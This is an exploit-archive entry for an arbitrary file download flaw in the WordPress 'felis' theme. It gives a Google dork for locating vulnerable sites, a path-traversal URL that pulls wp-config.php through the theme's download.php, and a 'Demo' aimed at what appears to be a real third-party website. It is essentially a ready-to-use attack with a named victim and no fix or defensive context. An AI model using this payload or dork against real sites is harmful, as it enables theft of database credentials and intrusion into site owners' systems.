id: 22627
date: 09/11/2014
title: WordPress felis theme Arbitrary File Download Vulnerability
author: Mr.Doel
cves: 

# Date: 2014-09-11
# Google Dork : inurl:/wp-content/themes/felis/
# Exploit Author: Mr.Doel
# Vendor Homepage: http://themeforest.net/item/felis-flexible-multipurpose-wordpress-theme/1596339
# Tested on: Windows 7 & Linux
  
POC :
  
http://localhost/wp-content/themes/felis/download.php?file=../wp-config.php
 
Demo :
  
http://www.arionspiritwine.com/wp-content/themes/felis/download.php?file=../wp-config.php
  
=====================
Greetz :
 
Don Tukulesto | Xr0b0t | k4l0ng666 | vYc0d | rm -rf | root.attack | Nemesis | bet0 |  
 
[+]Malang Cyber Crew - Indonesian Coder [+]

#  0day.today [2023-03-24]  #